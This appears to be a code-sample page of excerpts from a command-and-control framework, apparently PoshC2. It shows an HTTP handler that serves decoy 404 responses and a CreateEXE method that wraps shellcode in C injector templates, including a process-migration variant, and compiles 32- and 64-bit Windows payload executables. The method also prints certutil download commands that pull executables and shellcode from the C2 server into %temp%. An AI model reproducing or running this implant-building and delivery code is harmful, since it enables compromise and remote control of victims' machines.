                        self.end_headers()
                        HTTPResponsePage = select_item("GET_404_Response",
                                                       "C2Server")
                        if HTTPResponsePage:
                            self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
                        else:
                            self.wfile.write(bytes(GET_404_Response, "utf-8"))
                else:
                    self.send_response(200)
                    self.send_header("Content-type", "text/html")
                    self.end_headers()
                    self.wfile.write(default_response())
            except Exception as e:
                print(Colours.RED + "Generic error in POST request!" +
                      Colours.END)
                print(Colours.RED + UriPath + Colours.END)
                print(e)
                traceback.print_exc()
Ejemplo n.º 8
0
    def CreateEXE(self, name=""):
        with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name),
                  'rb') as f:
            sc64 = f.read()
        hexcode = "".join("\\x{:02x}".format(c) for c in sc64)
        sc64 = formStr("char sc[]", hexcode)

        with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc64))
        self.QuickstartLog("64bit EXE Payload written to: %s%sPosh64.exe" %
                           (self.BaseDirectory, name))
        filename = "%s%sPosh64.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc64))
        migrate_process = DefaultMigrationProcess
        if "\\" in migrate_process and "\\\\" not in migrate_process:
            migrate_process = migrate_process.replace("\\", "\\\\")
        ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
        self.QuickstartLog(
            "64bit EXE Payload written to: %s%sPosh64_migrate.exe" %
            (self.BaseDirectory, name))
        filename = "%s%sPosh64_migrate.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name),
                  'rb') as f:
            sc32 = f.read()
        hexcode = "".join("\\x{:02x}".format(c) for c in sc32)
        sc32 = formStr("char sc[]", hexcode)

        with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc32))
        self.QuickstartLog("32bit EXE Payload written to: %s%sPosh32.exe" %
                           (self.BaseDirectory, name))
        filename = "%s%sPosh32.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory,
                  'r') as f:
            content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc32))
        ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
        self.QuickstartLog(
            "32bit EXE Payload written to: %s%sPosh32_migrate.exe" %
            (self.BaseDirectory, name))
        filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory, name)
        output_file = open(filename, 'w')
        output_file.write(ccode)
        output_file.close()

        try:
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex64"
            filename = randomuri()
            self.QuickstartLog(Colours.END)
            self.QuickstartLog(
                "Download Posh64 & Posh32 executables using certutil:" +
                Colours.GREEN)
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.exe" %
                (uri, filename))
            if os.name == 'nt':
                compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            else:
                compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64.c -o %s%sPosh64.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32.c -o %s%sPosh32.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            subprocess.check_output(compile64, shell=True)
            subprocess.check_output(compile32, shell=True)
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex86"
            filename = randomuri()
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.exe" %
                (uri, filename))
            if os.name == 'nt':
                compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            else:
                compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
                compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
                    self.BaseDirectory, name, self.BaseDirectory, name)
            subprocess.check_output(compile64, shell=True)
            subprocess.check_output(compile32, shell=True)

            self.QuickstartLog(Colours.END)
            self.QuickstartLog(
                "Download Posh/Sharp x86 and x64 shellcode from the webserver:"
                + Colours.GREEN)
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/64/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/86/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/64/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))
            uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/86/portal"
            self.QuickstartLog(
                "certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
                (uri, filename))

        except Exception as e:
            print(e)
            print(
                "apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common"
            )
Ejemplo n.º 9
0
def default_response():
    return bytes((random.choice(HTTPResponses)).replace("#RANDOMDATA#", randomuri()), "utf-8")